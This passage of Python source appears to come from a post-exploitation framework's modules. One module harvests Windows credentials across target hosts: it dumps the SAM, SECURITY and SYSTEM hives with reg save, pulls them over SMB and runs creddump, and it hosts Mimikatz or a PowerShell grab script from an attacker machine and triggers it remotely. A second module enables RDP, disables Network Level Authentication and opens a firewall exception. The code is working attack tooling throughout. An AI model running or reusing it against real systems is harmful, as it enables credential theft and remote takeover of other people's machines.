        # serve the binary from lhost and trigger it on this target only
        delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod=triggerMethod, exeArgs=exeArgs)

        print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
        time.sleep(int(delay))

        # fetch and remove the result file (it contains plaintext passwords)
        out = smb.getFile(target, username, password, out_file, delete=True)

        msv1_0, kerberos, wdigest, tspkg = helpers.parseMimikatz(out)
        allmsv += msv1_0
        allkerberos += kerberos
        allwdigest += wdigest
        alltspkg += tspkg

        saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
        if out == "":
            self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
        else:
            self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"

    # summary sections, in the same order the parser returns them
    summaries = [("msv1_0", allmsv), ("kerberos", allkerberos), ("wdigest", allwdigest), ("tspkg", alltspkg)]
    for label, creds in summaries:
        if creds:
            self.output += "[*] All " + label + ":\n\t" + "\n\t".join(sorted(set(creds))) + "\n"
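def run(self):
    """Harvest credentials from every target: local hashes plus in-memory plaintexts.

    Per target one of two paths is taken, chosen by ``force_method`` or by a
    PowerShell probe:

    * PowerShell: ``autograb.ps1`` (Invoke-Mimikatz + powerdump) is hosted
      from ``lhost`` and its output file fetched and parsed for both hashes
      and plaintexts.
    * Binary: the SYSTEM/SECURITY/SAM hives are saved with ``reg save``,
      pulled over SMB and run through ``creddump``; then the arch-correct
      ``mimikatz.exe`` is hosted and triggered.

    The hive copies written to ``C:\\Windows\\Temp`` are queued for removal in
    ``self.cleanup``; local hive copies live in a private temporary directory
    that is removed before moving to the next target. Unique hashes and
    credentials are summarised at the end of ``self.output``, which also
    echoes the credentials used to authenticate.
    """
    import os
    import shutil
    import tempfile

    username, password = self.creds[0]
    lhost = self.required_options["lhost"][0]
    use_ssl = self.required_options["use_ssl"][0]
    force_method = self.required_options["force_method"][0]
    delay = self.required_options["delay"][0]
    out_file = self.required_options["out_file"][0]

    # a bare filename goes to the (world-writable) Temp directory; a path
    # containing a backslash is used as given. Resolved once, not per branch.
    if "\\" not in out_file:
        out_file = "C:\\Windows\\Temp\\" + out_file

    # remote locations "reg save" writes the hive copies to
    hivePaths = {
        "system": "C:\\Windows\\Temp\\system",
        "security": "C:\\Windows\\Temp\\security",
        "sam": "C:\\Windows\\Temp\\sam",
    }
    regSaveCommand = "reg save HKLM\\SYSTEM C:\\Windows\\Temp\\system /y && reg save HKLM\\SECURITY C:\\Windows\\Temp\\security /y && reg save HKLM\\SAM C:\\Windows\\Temp\\sam /y"
    # the hive copies are fetched with delete=False, so remove them on cleanup
    # rather than leaving SAM/SECURITY/SYSTEM snapshots on the target
    hiveCleanupCommand = "del /F /Q " + hivePaths["system"] + " " + hivePaths["security"] + " " + hivePaths["sam"]

    allhashes, allmsv, allkerberos, allwdigest, alltspkg = [], [], [], [], []

    for target in self.targets:
        # pick the grab method: forced, or detected with a trivial PowerShell expression
        if force_method.lower() == "binary":
            powershellInstalled = False
        elif force_method.lower() == "powershell":
            powershellInstalled = True
        else:
            powershellCommand = "powershell.exe -c \"$a=42;$a\""
            powershellResult = command_methods.executeResult(target, username, password, powershellCommand, "wmis")
            powershellInstalled = powershellResult.strip() == "42"

        if powershellInstalled:
            print(helpers.color("\n [*] Powershell installed on " + target))
            self.output += "[*] Powershell installed on " + target + ", using autograb.ps1\n"

            # combined Invoke-Mimikatz/powerdump script, hosted and triggered on this target only
            secondStagePath = settings.VEIL_PILLAGE_PATH + "/data/misc/autograb.ps1"
            delivery_methods.powershellHostTrigger(target, username, password, secondStagePath, lhost, "", triggerMethod="winexe", outFile=out_file, ssl=use_ssl, noArch=True)

            print("\n [*] Waiting " + delay + "s for Autograb to run...")
            time.sleep(int(delay))

            # fetch the result and remove it from the target (plaintext passwords inside)
            out = smb.getFile(target, username, password, out_file, delete=True)
            saveFile = helpers.saveModuleFile(self, target, "autograb.txt", out)

            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)
            allhashes.extend(helpers.parseHashdump(out))

            if out != "":
                self.output += "[*] Autograb.ps1 results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Autograb.ps1 failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"
        else:
            print(helpers.color("\n [!] Powershell not installed on " + target, warning=True))
            print(helpers.color("\n [*] Using reg.exe save method for hash dumping on " + target))
            self.output += "[!] Powershell not installed on " + target + "\n"

            # snapshot the hives on the target and queue their removal
            command_methods.executeCommand(target, username, password, regSaveCommand, "wmis")
            self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + hiveCleanupCommand + "|wmis\n"

            print(helpers.color("\n [*] Dumping hashes on " + target))
            # give reg.exe a moment to finish writing all three hives
            time.sleep(5)

            # Local copies go into a fresh 0700 directory instead of fixed
            # /tmp/<name> paths: no symlink/pre-creation games by other local
            # users, and no stale hive from a previous target can be picked up.
            scratch = tempfile.mkdtemp(prefix="veil-pillage-")
            try:
                localHives = {}
                for hive in ("system", "security", "sam"):
                    data = smb.getFile(target, username, password, hivePaths[hive], delete=False)
                    if data == "":
                        self.output += "[!] File '" + hivePaths[hive] + "' from " + target + " empty or doesn't exist\n"
                        continue
                    localPath = os.path.join(scratch, hive)
                    with open(localPath, "wb") as f:
                        f.write(data)
                    localHives[hive] = localPath

                # creddump needs the SYSTEM bootkey and the SAM; without both
                # there is nothing valid to parse for this target
                if "system" in localHives and "sam" in localHives:
                    out = creddump.dump_file_hashes(localHives["system"], localHives["sam"])
                    saveLocation = helpers.saveModuleFile(self, target, "creddump.txt", out)
                    self.output += "[*] dumped hashes (reg.exe) using creds '" + username + ":" + password + "' on " + target + " saved to " + saveLocation + "\n"
                    allhashes.extend(helpers.parseHashdump(out))
                else:
                    self.output += "[!] Hash dump skipped on " + target + " : SYSTEM or SAM hive could not be retrieved\n"
            finally:
                shutil.rmtree(scratch, ignore_errors=True)

            # architecture probe for the mimikatz binary
            archResult = command_methods.executeResult(target, username, password, "echo %PROCESSOR_ARCHITECTURE%", "wmis")
            arch = "x64" if "64" in archResult else "x86"
            mimikatzPath = settings.VEIL_PILLAGE_PATH + "/data/misc/mimikatz" + arch + ".exe"
            exeArgs = "\"sekurlsa::logonPasswords full\" \"exit\" >" + out_file

            # host and trigger on this machine only so the architecture matches
            delivery_methods.hostTrigger(target, username, password, mimikatzPath, lhost, triggerMethod="wmis", exeArgs=exeArgs)

            print("\n [*] Waiting " + delay + "s for Mimikatz to run...")
            time.sleep(int(delay))

            out = smb.getFile(target, username, password, out_file, delete=True)

            (msv1_0, kerberos, wdigest, tspkg) = helpers.parseMimikatz(out)
            allmsv.extend(msv1_0)
            allkerberos.extend(kerberos)
            allwdigest.extend(wdigest)
            alltspkg.extend(tspkg)

            saveFile = helpers.saveModuleFile(self, target, "mimikatz.txt", out)
            if out != "":
                self.output += "[*] Mimikatz results using creds '" + username + ":" + password + "' on " + target + " stored at " + saveFile + "\n"
            else:
                self.output += "[!] Mimikatz failed using creds '" + username + ":" + password + "' on " + target + " : no result file\n"

    # summaries: unique entries only, one section per source
    if len(allhashes) > 0:
        allhashes = sorted(set(allhashes))
        self.output += "[*] All unique hashes:\n\t" + "\n\t".join(allhashes) + "\n"
    if len(allmsv) > 0:
        allmsv = sorted(set(allmsv))
        self.output += "[*] All msv1_0:\n\t" + "\n\t".join(allmsv) + "\n"
    if len(allkerberos) > 0:
        allkerberos = sorted(set(allkerberos))
        self.output += "[*] All kerberos:\n\t" + "\n\t".join(allkerberos) + "\n"
    if len(allwdigest) > 0:
        allwdigest = sorted(set(allwdigest))
        self.output += "[*] All wdigest:\n\t" + "\n\t".join(allwdigest) + "\n"
    if len(alltspkg) > 0:
        alltspkg = sorted(set(alltspkg))
        self.output += "[*] All tspkg:\n\t" + "\n\t".join(alltspkg) + "\n"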
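def run(self):
    """Enable RDP on every target: allow TS connections, disable NLA, open the firewall.

    The three steps run in order and each only after the previous one
    reported success. A cleanup entry is queued for EVERY step that succeeds,
    so that running cleanup does not leave the host with NLA switched off and
    a firewall exception open while only re-denying TS connections.

    Caveats (the prior state is not queried before changing it):
    * NLA cleanup restores ``UserAuthentication`` to 1, the Windows default;
      if the host had NLA off already, cleanup will turn it on.
    * Firewall cleanup disables the Remote Desktop service exception; if that
      exception pre-existed, cleanup removes legitimate access.
    """
    username, password = self.creds[0]
    triggerMethod = self.required_options["trigger_method"][0]

    tsKey = "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server"
    rdpTcpKey = tsKey + "\\WinStations\\RDP-Tcp"

    # allow / deny Terminal Services connections
    rdpCMD = "reg add \"" + tsKey + "\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"
    rdpCleanupCMD = "reg add \"" + tsKey + "\" /v fDenyTSConnections /t REG_DWORD /d 1 /f"
    # disable / re-enable Network Level Authentication on the RDP-Tcp listener
    nlaCMD = "reg add \"" + rdpTcpKey + "\" /v UserAuthentication /t REG_DWORD /d 0 /f"
    nlaCleanupCMD = "reg add \"" + rdpTcpKey + "\" /v UserAuthentication /t REG_DWORD /d 1 /f"
    # open / close the legacy firewall's Remote Desktop service exception
    firewallCMD = "netsh firewall set service type = remotedesktop mod = enable"
    firewallCleanupCMD = "netsh firewall set service type = remotedesktop mode = disable"

    def queueCleanup(target, cmd):
        # cleanup entries use the same framework format as the other modules
        self.cleanup += "executeCommand|" + target + "|" + username + "|" + password + "|" + cmd + "|" + triggerMethod + "\n"

    for target in self.targets:
        rdpResult = command_methods.executeResult(target, username, password, rdpCMD, triggerMethod)

        if rdpResult == "":
            self.output += "[!] No result file, RDP enable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            continue
        if "The operation completed successfully" not in rdpResult:
            self.output += "[!] Error in enabling RDP using creds '" + username + ":" + password + "' on : " + target + "\n"
            continue

        self.output += "[*] RDP successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
        queueCleanup(target, rdpCleanupCMD)

        nlaResult = command_methods.executeResult(target, username, password, nlaCMD, triggerMethod)

        if nlaResult == "":
            self.output += "[!] No result file, NLA disable failed using creds '" + username + ":" + password + "' on : " + target + "\n"
            continue
        if "The operation completed successfully" not in nlaResult:
            self.output += "[!] Error in disabling NLA using creds '" + username + ":" + password + "' on : " + target + "\n"
            continue

        self.output += "[*] NLA successfully disabled using creds '" + username + ":" + password + "' on : " + target + "\n"
        queueCleanup(target, nlaCleanupCMD)

        firewallResult = command_methods.executeResult(target, username, password, firewallCMD, triggerMethod)

        if firewallResult == "":
            self.output += "[!] No result file, firewall exeception failed using creds '" + username + ":" + password + "' on : " + target + "\n"
        elif "executed successfully" in firewallResult:
            self.output += "[*] Firewall exception successfully enabled using creds '" + username + ":" + password + "' on : " + target + "\n"
            queueCleanup(target, firewallCleanupCMD)
        else:
            self.output += "[!] Error in enabling firewall exception using creds '" + username + ":" + password + "' on : " + target + "\n"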